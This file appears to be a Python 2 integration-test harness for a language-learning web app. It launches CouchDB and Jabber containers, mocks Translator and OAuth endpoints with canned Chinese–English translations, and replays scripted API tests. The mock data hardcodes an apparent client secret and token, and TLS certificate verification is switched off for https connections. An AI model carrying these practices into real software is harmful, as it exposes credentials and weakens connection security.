couch = parameters["couch_proto"] + "://" + parameters["couch_server"] + ":" + str(parameters["couch_port"]) + ((parameters["couch_path"] + "/") if "couch_path" in parameters else "/")
couch_config = parameters["couch_proto"] + "://" + parameters["couch_server"] + ":" + str(test["config_port"]) + ((parameters["couch_path"] + "/") if "couch_path" in parameters else "/")
target_verify = True if test["target_proto"] == "http" else False
couch_verify = True if parameters["couch_proto"] == "http" else False
current_cookie = False
test_timeout = 60
oauth = { "codes" : {}, "states" : {}, "tokens" : {}}
mock_rest = {
"TranslatorAccess" : [ dict(inp = {"client_secret": "fge8PkcT/cF30AcBKOMuU9eDysKN/a7fUqH6Tq3M0W8=", "grant_type": "client_credentials", "client_id": "micalearning", "scope": "http://localhost:" + str(server_port) + "/TranslatorRequest"},
outp = {"token_type": "http://schemas.xmlsoap.org/ws/2009/11/swt-token-profile-1.0", "access_token": "http%3a%2f%2fschemas.xmlsoap.org%2fws%2f2005%2f05%2fidentity%2fclaims%2fnameidentifier=micalearning&http%3a%2f%2fschemas.microsoft.com%2faccesscontrolservice%2f2010%2f07%2fclaims%2fidentityprovider=https%3a%2f%2fdatamarket.accesscontrol.windows.net%2f&Audience=http%3a%2f%2fapi.microsofttranslator.com&ExpiresOn=1448071220&Issuer=https%3a%2f%2fdatamarket.accesscontrol.windows.net%2f&HMACSHA256=p2YmU56ljSJjtcQOpViQaKZ1JpEOZJiCGQJf5otxmpA%3d", "expires_in": "599", "scope": "http://api.microsofttranslator.com"}),
],
"TranslatorRequest" : [
{"outp": [{"TranslatedText": "Baise", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [5]}], "inp": {"texts": "[\"\\u767e\\u8272\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Business", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [8]}], "inp": {"texts": "[\"\\u751f\\u610f\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Centimetre", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [10]}], "inp": {"texts": "[\"\\u5398\\u7c73\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Cheap", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [5]}], "inp": {"texts": "[\"\\u4fbf\\u5b9c\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Collection", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [10]}], "inp": {"texts": "[\"\\u6c47\\u96c6\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Come out", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [8]}], "inp": {"texts": "[\"\\u51fa\\u6765\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Fair", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [4]}], "inp": {"texts": "[\"\\u516c\\u9053\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Family", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [6]}], "inp": {"texts": "[\"\\u4eba\\u5bb6\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Get up", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [6]}], "inp": {"texts": "[\"\\u8d77\\u6765\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Hot", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [3]}, {"TranslatedText": "Inflammation", "From": "zh-CHS", "OriginalTextSentenceLengths": [1], "TranslatedTextSentenceLengths": [12]}, {"TranslatedText": "It's hot", "From": "zh-CHS", "OriginalTextSentenceLengths": [1], "TranslatedTextSentenceLengths": [8]}], "inp": {"texts": "[\"\\u708e\\u70ed\", \"\\u708e\", \"\\u70ed\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "How", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [3]}], "inp": {"texts": "[\"\\u600e\\u4e48\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Husband", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [7]}], "inp": {"texts": "[\"\\u8001\\u516c\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Internet", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [8]}], "inp": {"texts": "[\"\\u7f51\\u7edc\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "King", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [4]}], "inp": {"texts": "[\"\\u5927\\u738b\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Modern", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [6]}], "inp": {"texts": "[\"\\u73b0\\u4ee3\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Nausea", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [6]}], "inp": {"texts": "[\"\\u6076\\u5fc3\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Promise", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [7]}], "inp": {"texts": "[\"\\u51fa\\u606f\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Relationship", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [12]}], "inp": {"texts": "[\"\\u5173\\u7cfb\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Reporting", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [9]}], "inp": {"texts": "[\"\\u6c47\\u62a5\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Review", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [6]}], "inp": {"texts": "[\"\\u590d\\u4e60\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Story", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [5]}], "inp": {"texts": "[\"\\u6545\\u4e8b\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Take care of", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [12]}], "inp": {"texts": "[\"\\u7167\\u5e94\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Things", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [6]}], "inp": {"texts": "[\"\\u4e1c\\u897f\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "View", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [4]}], "inp": {"texts": "[\"\\u8bf4\\u6cd5\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Where", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [5]}], "inp": {"texts": "[\"\\u54ea\\u91cc\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Wonder", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [6]}], "inp": {"texts": "[\"\\u7422\\u78e8\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "Woods", "From": "zh-CHS", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [5]}], "inp": {"texts": "[\"\\u6811\\u6797\"]", "from": "zh-CHS", "options": "null", "to": "en"}},
{"outp": [{"TranslatedText": "\u4e08\u592b", "From": "en", "OriginalTextSentenceLengths": [7], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Husband\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp" : [{"TranslatedText": "\u4e0d\u77e5\u9053", "From": "en", "OriginalTextSentenceLengths": [6], "TranslatedTextSentenceLengths": [3]}], "inp": {"texts": "[\"Wonder\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u4e0d\u77e5\u9053", "From": "en", "OriginalTextSentenceLengths": [6], "TranslatedTextSentenceLengths": [3]}], "inp": {"texts": "[\"Wonder\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u4e1a\u52a1", "From": "en", "OriginalTextSentenceLengths": [8], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Business\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u4e8b\u60c5", "From": "en", "OriginalTextSentenceLengths": [6], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Things\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u4e92\u8054\u7f51", "From": "en", "OriginalTextSentenceLengths": [8], "TranslatedTextSentenceLengths": [3]}], "inp": {"texts": "[\"Internet\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u4ece\u524d\u6709\u4e2a\u5c0f\u5b69", "From": "en", "OriginalTextSentenceLengths": [6], "TranslatedTextSentenceLengths": [6]}], "inp": {"texts": "[\"\\u4ece\\u524d\\u6709\\u4e2a\\u5c0f\\u5b69\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u4f0d\u5179", "From": "en", "OriginalTextSentenceLengths": [5], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Woods\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u4fbf\u5b9c", "From": "en", "OriginalTextSentenceLengths": [5], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Cheap\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u516c\u5e73", "From": "en", "OriginalTextSentenceLengths": [4], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Fair\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u5173\u7cfb", "From": "en", "OriginalTextSentenceLengths": [12], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Relationship\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u5398\u7c73", "From": "en", "OriginalTextSentenceLengths": [10], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Centimetre\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u56fd\u738b", "From": "en", "OriginalTextSentenceLengths": [4], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"King\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u5728\u54ea\u91cc", "From": "en", "OriginalTextSentenceLengths": [5], "TranslatedTextSentenceLengths": [3]}], "inp": {"texts": "[\"Where\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u5982\u4f55", "From": "en", "OriginalTextSentenceLengths": [3], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"How\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u5ba1\u67e5", "From": "en", "OriginalTextSentenceLengths": [6], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Review\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u5bb6\u5ead", "From": "en", "OriginalTextSentenceLengths": [6], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Family\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u6076\u5fc3", "From": "en", "OriginalTextSentenceLengths": [6], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Nausea\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u627f\u8bfa", "From": "en", "OriginalTextSentenceLengths": [7], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Promise\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u62a5\u544a", "From": "en", "OriginalTextSentenceLengths": [9], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Reporting\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u6545\u4e8b", "From": "en", "OriginalTextSentenceLengths": [5], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Story\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u6765\u5427", "From": "en", "OriginalTextSentenceLengths": [4], "TranslatedTextSentenceLengths": [2]}, {"TranslatedText": "\u51fa", "From": "en", "OriginalTextSentenceLengths": [3], "TranslatedTextSentenceLengths": [1]}], "inp": {"texts": "[\"Come\", \"out\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u73b0\u4ee3", "From": "en", "OriginalTextSentenceLengths": [6], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Modern\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u767e\u8272", "From": "en", "OriginalTextSentenceLengths": [5], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Baise\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u83b7\u53d6", "From": "en", "OriginalTextSentenceLengths": [3], "TranslatedTextSentenceLengths": [2]}, {"TranslatedText": "\u5411\u4e0a", "From": "en", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Get\", \"up\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u89c6\u56fe", "From": "en", "OriginalTextSentenceLengths": [4], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"View\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u91c7\u53d6", "From": "en", "OriginalTextSentenceLengths": [4], "TranslatedTextSentenceLengths": [2]}, {"TranslatedText": "\u4fdd\u5065", "From": "en", "OriginalTextSentenceLengths": [4], "TranslatedTextSentenceLengths": [2]}, {"TranslatedText": "\u7684", "From": "en", "OriginalTextSentenceLengths": [2], "TranslatedTextSentenceLengths": [1]}], "inp": {"texts": "[\"Take\", \"care\", \"of\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
{"outp": [{"TranslatedText": "\u96c6\u5408", "From": "en", "OriginalTextSentenceLengths": [10], "TranslatedTextSentenceLengths": [2]}], "inp": {"texts": "[\"Collection\"]", "from": "en", "options": "null", "to": "zh-CHS"}},
],
#"" : [dict(inp = , outp = ),],
#"" : [dict(inp = , outp = ),],
}
def my_parse(data) :
url_parameters = {}
parsed_data = parse_qs(data, keep_blank_values=1)
for k, v in parsed_data.iteritems() :
v = v[0] if (isinstance(v, list) and len(v) == 1) else v
url_parameters[k] = v
return url_parameters
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
email_count = 1
def check_mock_data(self, path, url_parameters) :
body = ""
for key in mock_rest.keys() :
if not path.count(key) :
continue
found = False
for pair in mock_rest[key] :
if url_parameters != pair["inp"] :
#tlog(" " + str(url_parameters) + " != " + str(pair["inp"]))
continue
#tlog(" MOCKING: " + key + ": " + str(url_parameters))
found = True
body = json_dumps(pair["outp"])
break
if not found :
tlog(" WARNING. NEVER Seen this input: " + str(url_parameters))
continue
break
return body
def do_POST(self) :
body = ""
url = urlparse(self.path)
url_parameters = my_parse(url.query)
path = url.path.replace("/", "")
length = int(self.headers.getheader('content-length'))
url_parameters.update(my_parse(self.rfile.read(length)))
result = 200
result_msg = "OK"
#tlog(" " + str(path) + ": " + str(url_parameters))
body = sdict(success = True, test_success = True)
if path in parameters["oauth"].keys() :
#tlog(" TOKEN REQUEST from: " + path)
if url_parameters["code"] != oauth["codes"][path] or url_parameters["client_secret"] != parameters["oauth"][path]["client_secret"] :
result = 401
result_msg = "Bad Things"
body = {"error" : "bad things"}
oauth["tokens"][path] = binascii_hexlify(os_urandom(4))
body = sdict(access_token = oauth["tokens"][path], token_type = "Bearer", expires_in = 3597)
else :
body = self.check_mock_data(path, url_parameters)
try:
self.send_response(result, result_msg)
self.send_header('Content-type','text/html')
self.send_header("Content-length", str(len(body)))
self.end_headers()
self.wfile.write(body)
except:
tlog(" Error")
def do_GET(self):
if self.path.endswith(".html"):
#self.path has /index.htm
f = open(curdir + sep + self.path)
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
self.wfile.write("<h1>Device Static Content</h1>")
self.wfile.write(f.read())
f.close()
return
url = urlparse(self.path)
url_parameters = my_parse(url.query)
path = url.path.replace("/", "")
#tlog(" " + str(path) + ": " + str(url_parameters))
result = 200
result_msg = "OK"
body = sdict(success = True, test_success = True)
if path in parameters["oauth"].keys() :
body_dict = {}
if "email_key" in parameters["oauth"][path] and parameters["oauth"][path]["email_key"] :
recursiveSetInDict(body_dict, parameters["oauth"][path]["email_key"].split(","), path + str(MyHandler.email_count) + "@holymother.com")
MyHandler.email_count += 1
if "verified_key" in parameters["oauth"][path] and parameters["oauth"][path]["verified_key"] :
body_dict[parameters["oauth"][path]["verified_key"]] = True
recursiveSetInDict(body_dict, parameters["oauth"][path]["verified_key"].split(","), True)
body = json_dumps(body_dict)
else :
body = self.check_mock_data(path, url_parameters)
self.send_response(result, result_msg)
self.send_header('Content-type', 'html')
self.send_header("Content-length", str(len(body)) )
self.end_headers()
self.wfile.write(body)
class TimeoutServer(BaseHTTPServer.HTTPServer):
def get_request(self):
result = self.socket.accept()
result[0].settimeout(10)
return result
def change_timeout(timeout) :
tlog("Changing timeout to " + str(timeout))
s = requests.Session()
r = s.post(couch_config + "_session", data = {"name" : parameters["admin_user"], "password" : parameters["admin_pass"]}, verify = couch_verify)
if r.status_code not in [200, 201] :
raise Exception("Failed to login for timeout change")
r = s.get(couch_config + "_config", verify = couch_verify)
if r.status_code not in [200, 201] :
raise Exception("Failed to lookup configuration: " + str(r.status_code))
config = r.json()
r = s.put(couch_config + "_config/couch_httpd_auth/timeout", data = "\"" + str(timeout) + "\"", verify = couch_verify)
if r.status_code not in [200, 201] :
raise Exception("Failed to change timeout to " + str(timeout) + " seconds" + ": " + str(r.status_code) + ": " + r.text)
# Old timeout is returned
return r.text
def oauth_responder(httpd_server) :
sa = httpd_server.socket.getsockname()
tlog("Serving HTTP on", sa[0], "port", sa[1], "...")
httpd_server.serve_forever()
def check_port(hostname, port, protocol = "TCP") :
try :
if protocol == "TCP" :
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
elif protocol == "UDP" :
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(5)
sock.connect((hostname, port if port is None else port))
sock.close()
return True
except socket.error, msg :
tlog("Unable to connect to " + protocol + " port " + str(port) + " on host " + hostname + " => " + str(msg))
sock.close()
sock = None
return False
def cleanup(name) :
try :
details = c.inspect_container(name)
if details["State"]["Running"] :
tlog("Stopping: " + name)
c.kill(name)
tlog("Removing: " + name)
c.remove_container(name)
except docker.errors.NotFound, e :
tlog("No container to cleanup: " + name)
def move_data_to_url(url) :
temp_url = url["loc"]
first = True
if "data" in url :
for key in url["data"].keys() :
temp_url += ("&" if not first else "?" ) + key + "=" + str(url["data"][key])
if first :
first = False
return temp_url
def flatten(head_url) :
flat_urls = []
if isinstance(head_url, list) :
for sub_url in head_url :
flat_urls.append(sub_url)
else :
flat_urls.append(head_url)
return flat_urls
def repopulate_states() :
r = s.get(target + "/disconnect", verify = target_verify)
assert(r.status_code == 200)
td = pq(r.text)
for who in parameters["oauth"].keys() :
if who == "redirect" :
continue
for part in td("#oauth_" + who).attr("href").split("&") :
if part.count("state") :
oauth["states"][who] = part.split("=")[1]
break
def run_tests(test_urls) :
global current_cookie
test_urls = deepcopy(test_urls)
# Flatten the nested test groups into a single list of tests
flat_urls = []
for head_url in test_urls :
flatcount = 1
if "repeat" in head_url :
for x in range(0, head_url["repeat"]) :
for sub_url in flatten(head_url["urls"]) :
flat_urls += flatten(sub_url)
else :
flat_urls += flatten(head_url)
tlog("Tests: " + str(len(flat_urls)))
stop_test = False
last_json = {}
try:
for tidx in range(0, len(flat_urls)) :
url = flat_urls[tidx]
if "stop" in url and url["stop"] :
tlog("Stop requested.")
stop_test = True
break
start = timest()
job_was_running = False
if "data" in url :
fkeys = ["uuid"] if "upload" not in url else []
if "forward_keys" in url :
for key in url["forward_keys"] :
if key not in fkeys :
fkeys.append(key)
for key in fkeys :
dest_key = key
if key.count("/") :
dest_key = key.split("/")[1]
key = key.split("/")[0]
if key in last_json and key not in url["data"] :
if key != "uuid" :
tlog(" Updating key " + str(dest_key) + " in data with value: " + last_json[key])
url["data"][dest_key] = last_json[key]
finaldest = target if ("couch" not in url or not url["couch"]) else couch
verify = target_verify if ("couch" not in url or not url["couch"]) else couch_verify
secs = int(time()) - start_time
tlogmsg = "Test (@" + str(secs) + ") " + str(tidx) + "/" + str(len(flat_urls)) + ": " + url["method"].upper() + ": " + (url["loc"].replace("/api?human=0&alien=", "").replace("&", ", ").replace("=", " = ").replace("&", ", ") if "loc" in url else "nowhere") + ", data: " + (str(url["data"]) if "data" in url else "none")
max_retries = 5
retry_attempts = 0
until_attempts = 0
while retry_attempts < max_retries and until_attempts < 30 :
cookie_found = False
tlog(tlogmsg)
record.write(tlogmsg + "\n")
record.flush()
if "sleep" in url :
tlog(" Sleeping for " + str(url["sleep"]) + " seconds...")
sleep(url["sleep"])
break
if url["loc"].count("state=") and url["loc"].count("finish=") :
[left, right] = url["loc"].split("?")
oparams = my_parse(right)
if oparams["state"] != oauth["states"][oparams["alien"]] :
#tlog(" State is stale. correcting.")
oparams["state"] = oauth["states"][oparams["alien"]]
url["loc"] = left + "?" + urlencode(oparams)
if url["method"] == "get" :
udest = finaldest + move_data_to_url(url)
r = s.get(udest, verify = verify, cookies = dict(AuthSession = current_cookie) if current_cookie else {})
elif url["method"] == "post" :
udest = finaldest + url["loc"]
pdata = deepcopy(url["data"])
if current_cookie :
pdata["Cookie"] = "AuthSession=" + current_cookie
r = s.post(udest, data = pdata, verify = verify)
elif url["method"] == "put" :
headers = {}
if current_cookie :
headers["Cookie"] = "AuthSession=" + current_cookie
if "upload" in url :
fname = cwd + 'example_stories/' + url["upload"]
tlog(" Uploading file: " + fname)
udest = finaldest + move_data_to_url(url)
headers['content-type'] = url["upload_type"]
r = s.put(udest, headers = headers, data = open(fname, 'rb').read(), verify = verify)
else :
udest = finaldest + url["loc"]
r = s.put(udest, headers = headers, data = json_dumps(url["data"]), verify = verify)
stop = timest()
if 'AuthSession' in r.cookies :
current_cookie = r.cookies['AuthSession']
#tlog(" Setting cookie: " + current_cookie)
cookie_found = True
if r.status_code not in [200, 201] :
if r.status_code == 504 :
tlog(" Gateway timeout to: " + udest + ", Try the request again...")
retry_attempts += 1
run_tests(common_urls["relogin"])
sleep(5)
continue
if r.status_code == 401 :
tlog(" Our token may have expired. Login again and retry the test: " + str(r.text))
# For auth tests, 401 means the oauth state parameter
# is no longer valid. We have to update it.
if url["loc"].count("state=") and url["loc"].count("finish=") :
#tlog("Repopulating oauth state value...")
repopulate_states()
if "retry_action" in url :
run_tests(common_urls[url["retry_action"]])
else :
run_tests(common_urls["relogin"])
retry_attempts += 1
sleep(5)
continue
tlog(" Bad status code: " + str(r.status_code) + ": " + r.text)
assert(False)
else :
#tlog(" Resetting all attempts to zero.")
retry_attempts = 0
until_attempts = 0
# The difference between 'success' and 'test_success' is for errors
# that happen during tests which are tolerable in the user experience.
# For example, if the translation API can't reach the internet, the
# UI will just return that connectivity information to the user, but
# it does not mean there's a failure in the system. But, it is indeed
# a unit test failure, so we need to know about it and check for it.
try :
j = json_loads(r.text)
last_json = j
if "cookie" in j and not cookie_found :
current_cookie = j["cookie"].split("=")[1]
tlog(" using json cookie: " + current_cookie)
except ValueError, e :
tlog(" Failed to parse JSON from:\n" + r.text)
#tlog(" Failed to parse JSON.")
assert(False)
#retry_attempts += 1
#sleep(5)
#continue
if "job_running" in j and j["job_running"] and ("check_job_running" not in url or url["check_job_running"]):
#if not job_was_running :
tlog(" There is a job running. Coming back later.")
job_was_running = True
sleep(5)
continue
if "until" in url :
v = getFromDict(j, url["until"]["path"])
if v != url["until"]["equals"] :
tlog(" Until " + str(v) + " != " + url["until"]["equals"])
sleep(5)
until_attempts += 1
continue
diff = stop - start
#tlog(" Time: " + str(int(diff)) + " secs.")
if "success" in url and url["success"] is not None :
assert("success" in j)
if j["success"] != url["success"] :
tlog("resulting JSON: " + str(j))
tlog("Success failed. Requested: " + str(url["success"]) + ", Got: " + str(j["success"]))
assert(False)
if "test_success" in url and url["test_success"] is not None :
assert("test_success" in j)
if j["test_success"] != url["test_success"] :
tlog("resulting JSON: " + str(j))
tlog(" Test Success failed. Requested: " + str(url["test_success"]) + ", Got: " + str(j["test_success"]))
assert(False)
break
if retry_attempts >= max_retries :
tlog(" Failed to retry last run after 3 attempts.")
stop_test = True
assert(False)
if until_attempts >= 30 :
tlog(" Failed to until last run after 30 attempts.")
stop_test = True
assert(False)
except KeyboardInterrupt:
tlog("CTRL-C interrupt")
return stop_test
c = Client(base_url = test["docker_base_url"], version = test["docker_api_version"])
s = requests.Session()
options = []
if test["start_jabber"] :
options.append(
dict(
image = test["jabber_container"],
command = ["/bin/bash", "-c", "(/home/mrhines/mica/restart.sh &); bash"],
hostname = 'jabber',
name = test["jabber_name"],
tty = True,
ports = [5280, 22, 5222, 5223, 5281],
host_config = c.create_host_config(port_bindings = {
"22/tcp": ("0.0.0.0", 4444),
"5222/tcp": ("0.0.0.0", 5222),
"5223/tcp": ("0.0.0.0", 5223),
"5280/tcp": ("0.0.0.0", 5280),
"5281/tcp": ("0.0.0.0", 5281),
})
)
)
fh = open(cwd + "../params.py")
raw_params = fh.read()
fh.close()
options.append(
dict(
image = test["couch_container"],
command = ["/bin/bash", "-c", "cd /home/mrhines/mica/; git pull; (/home/mrhines/mica/restart.sh &); bash"],
name = test["couch_name"],
tty = True,
ports = [5984, 22, 5986],
volumes = [ "/var/log/" ],
environment = dict(CUSER = test["username"], CPASS = test["password"], CPARAMS = raw_params),
host_config = c.create_host_config(port_bindings = {
"5984/tcp": ("0.0.0.0", 5985),
"5986/tcp": ("0.0.0.0", 5986),
"22/tcp": ("0.0.0.0", 6222),
}, binds = [
cwd + "../logs:/var/log/",
]
)
)
)
def wait_for_port_ready(name, proto, hostname, port) :
targ = proto + "://" + hostname
tlog("Checking " + hostname + ":" + str(port))
while True :
if check_port(hostname, port) :
try :
r = s.get(targ + ":" + str(port), verify = True if proto == "http" else False)
tlog("Container " + name + " ready.")
break
except requests.exceptions.ConnectionError, e :
tlog("Container " + name + " not ready: " + str(e) + ". Waiting...")
else :
tlog("Port not open yet. Waiting...")
sleep(1)
tlog("Check complete.")
for option in options :
cleanup(option["name"])
tlog("Creating container: " + option["name"])
details = c.create_container(**option)
tlog("Creation complete.")
c.start(option["name"])
port = option["ports"][0]
hostname = c.inspect_container(option["name"])["NetworkSettings"]["IPAddress"]
#hostname = parameters["couch_server"]
wait_for_port_ready(option["name"], "http", hostname, port)
if len(sys.argv) > 1 and sys.argv[1] == "stop" :
tlog("Containers are created. Stopping now.")
exit(0)
urls = []
if "test" not in parameters or not parameters["test"] :
parameters["trans_scope"] = "http://localhost:" + str(server_port) + "/TranslatorRequest"
parameters["trans_access_token_url"] = "http://localhost:" + str(server_port) + "/TranslatorAccess"
httpd = TimeoutServer(('127.0.0.1', server_port), MyHandler)
oresp = Thread(target=oauth_responder, args = [httpd])
oresp.daemon = True
oresp.start()
parameters["timeout"] = test_timeout * 2
#parameters["multipliers"] = { "days" : 7, "weeks" : 4, "months" : 12, "years" : 10, "decades" : 10 }
#parameters["counts"] = { "days" : 1, "weeks" : 7, "months" : 30, "years" : 365, "decades" : 3650 }
#parameters["seconds_in_day"] = 60*60*24
mthread = Thread(target=go, args = [parameters])
mthread.daemon = True
mthread.start()
wait_for_port_ready("mica", test["target_proto"], test["target"], test["target_port"])
tlog("Waiting for startup...")
sleep(10)
r = s.get(target + "/disconnect", verify = target_verify)
assert(r.status_code == 200)
r = s.get(target, verify = target_verify)
assert(r.status_code == 200)
d = pq(s.get(target, verify = target_verify).text)
def add_oauth_tests() :
for who in parameters["oauth"].keys() :
if who == "redirect" :
continue
for part in d("#oauth_" + who).attr("href").split("&") :
if part.count("state") :
state = part.split("=")[1]
oauth["states"][who] = state
oauth["codes"][who] = binascii_hexlify(os_urandom(4))
urls.append(common_urls["logout"])
